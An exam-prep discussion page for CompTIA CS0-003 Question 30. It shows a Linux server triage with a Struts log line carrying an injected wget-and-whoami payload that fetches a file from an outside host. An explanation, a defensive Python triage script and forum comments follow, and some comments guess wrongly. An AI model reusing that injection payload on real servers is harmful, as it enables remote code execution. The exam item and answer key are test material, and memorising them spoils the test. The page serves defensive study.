CompTIA Exam CS0-003 Topic 3 Question 30 Discussion

Actual exam question for CompTIA's CS0-003 exam
Question #: 30
Topic #: 3

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:208)
at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)
at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getInstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)
at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Suggested Answer: B

The WARN line from the Struts multipart request parser echoes back a request it could not parse, and what it echoes is not a normal multipart body but a pair of shell commands (wget http://grohl.ve.da/tmp/brkgtr.zip followed by whoami). That is the signature of an attempt to make the web server run attacker-supplied commands. The /etc/passwd listing explains why this matters: the http service account, the account the web server runs under, has /bin/bash as its login shell, while the other service accounts are locked down with /usr/bin/nologin, so anything the web server is tricked into executing runs as a usable shell account. The adversary is therefore most likely trying to execute commands through an unsecured service account, here to download and then run the brkgtr.zip payload, a common first step toward gaining a foothold and further compromising the system.
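The two checks a responder performs by eye in this question, spotting a service account with an interactive shell and pulling the injected commands out of the parser warning, can be scripted for repeatable triage. The following is an added example, not part of the exam question or the site's explanation; the passwd and log samples are constructed to mirror the output above, and the set of non-interactive shells and the system-uid cutoff are assumptions a real host may need adjusted.

```python
import re

# Constructed sample input modelled on the triage output above; illustration data,
# not a copy of any real host's files.
PASSWD_SAMPLE = """\
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
"""

LOG_SAMPLE = """\
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getInstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188)
"""

# Shells that do not give an interactive login (assumed list; extend for your distro).
# Any other shell on a system account deserves a second look during triage.
NON_INTERACTIVE_SHELLS = {
    "/usr/bin/nologin", "/sbin/nologin", "/usr/sbin/nologin",
    "/bin/false", "/usr/bin/false", "/usr/bin/git-shell",
}

# Struts multipart parser warning that echoes the offending request back verbatim;
# the captured group is the parenthesised payload containing '#'-prefixed commands.
MULTIPART_WARN = re.compile(
    r"WARN \[struts2\.dispatcher\.multipart\.\w+\] Unable to parse request "
    r".*?\(([^()]*#[^()]*)\)\s*$"
)
URL_RE = re.compile(r"https?://[^\s;)'\"]+")


def interactive_service_accounts(passwd_text, system_uid_max=1000):
    """Return (name, uid, shell) for system accounts whose login shell is interactive.

    'System account' means a uid below system_uid_max (root excluded, since root is
    expected to have a real shell) or the conventional nobody uid 65534.
    """
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed entry: skip rather than guess
        name, _, uid, _, _, _, shell = fields
        uid = int(uid)
        is_system = (0 < uid < system_uid_max) or uid == 65534
        if is_system and shell not in NON_INTERACTIVE_SHELLS:
            findings.append((name, uid, shell))
    return findings


def injected_commands(log_text):
    """Extract shell commands and download URLs from multipart parse warnings.

    Returns one {'commands': [...], 'urls': [...]} dict per matching log line.
    """
    events = []
    for line in log_text.splitlines():
        m = MULTIPART_WARN.search(line)
        if not m:
            continue
        payload = m.group(1)
        # Commands are ';'-separated and each is prefixed with '#'.
        commands = [c.strip().lstrip("#").strip() for c in payload.split(";")]
        commands = [c for c in commands if c]
        events.append({"commands": commands, "urls": URL_RE.findall(payload)})
    return events


def triage(passwd_text, log_text):
    """Combine both checks into a single verdict string plus the supporting evidence."""
    accounts = interactive_service_accounts(passwd_text)
    events = injected_commands(log_text)
    if events and accounts:
        verdict = "command execution via service account"
    elif events:
        verdict = "command injection attempted"
    else:
        verdict = "no injection indicators"
    return {"service_accounts": accounts, "events": events, "verdict": verdict}


if __name__ == "__main__":
    result = triage(PASSWD_SAMPLE, LOG_SAMPLE)
    for name, uid, shell in result["service_accounts"]:
        print(f"service account {name} (uid {uid}) has interactive shell {shell}")
    for ev in result["events"]:
        print("injected commands:", ev["commands"], "download URLs:", ev["urls"])
    print("verdict:", result["verdict"])
```

On the sample data the script flags http (uid 33, /bin/bash) as the only service account with a usable shell, recovers the two commands and the download URL from the warning, and returns the verdict "command execution via service account". The URLs it extracts are the artifacts to block at the egress proxy and to search for across other hosts; the flagged account is the one whose shell should be set to nologin once the incident is contained.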


Contribute your Thoughts:

Wava
12 days ago
I bet the adversary is trying to 'git' their hands on the server. Get it? Git? Oh, come on, that was a good one!
upvoted 0 times
Shakira
20 days ago
Denial-of-service attack on the web server? Pff, that's so 2005. Let's see some real hacking skills here, people.
upvoted 0 times
Socorro
2 days ago
Which of the following is the adversary most likely trying to do?
upvoted 0 times
Filiberto
3 days ago
I agree, executing commands through an unsecured service account seems more like what the adversary is trying to do in this case.
upvoted 0 times
Lindsey
15 days ago
Yeah, denial-of-service attacks are old news. Real hackers go for more sophisticated techniques.
upvoted 0 times
Ozell
1 month ago
A backdoor root account named zsh? That's just lazy. At least try to be a little more creative with your attacks, buddy.
upvoted 0 times
Alona
1 day ago
We should definitely investigate further and secure the server.
upvoted 0 times
Daron
11 days ago
Yeah, they're probably trying to gain access and control the server.
upvoted 0 times
Renay
16 days ago
Looks like they're trying to execute commands through the http service account.
upvoted 0 times
Na
17 days ago
Agreed, using a common username like 'root' is a dead giveaway.
upvoted 0 times
Pearlene
1 month ago
Wow, a beacon to a command-and-control server? This incident just got a whole lot more serious. We need to act fast!
upvoted 0 times
Yuki
12 days ago
Let's make sure to isolate the server from the network to prevent further damage.
upvoted 0 times
Laquita
25 days ago
I agree, we should also check for any other signs of compromise on the server.
upvoted 0 times
Louann
27 days ago
We need to analyze the situation carefully before taking any action.
upvoted 0 times
Trinidad
1 month ago
I believe the adversary is trying to execute commands through an unsecured service account.
upvoted 0 times
Eun
1 month ago
I agree with Kaycee, it seems like the most likely scenario based on the output.
upvoted 0 times
Delfina
2 months ago
Hmm, looks like someone's trying to execute commands through an unsecured service account. That's not good news at all.
upvoted 0 times
Avery
16 days ago
We need to act fast to prevent any further damage to the server.
upvoted 0 times
Sharmaine
19 days ago
I'll check the logs to see if there are any other suspicious activities going on.
upvoted 0 times
Amina
29 days ago
We should investigate further to see what commands they are trying to run.
upvoted 0 times
Cornell
1 month ago
I agree, it seems like they are trying to exploit the http service account.
upvoted 0 times
Kaycee
2 months ago
I think the adversary is trying to create a backdoor root account named zsh.
upvoted 0 times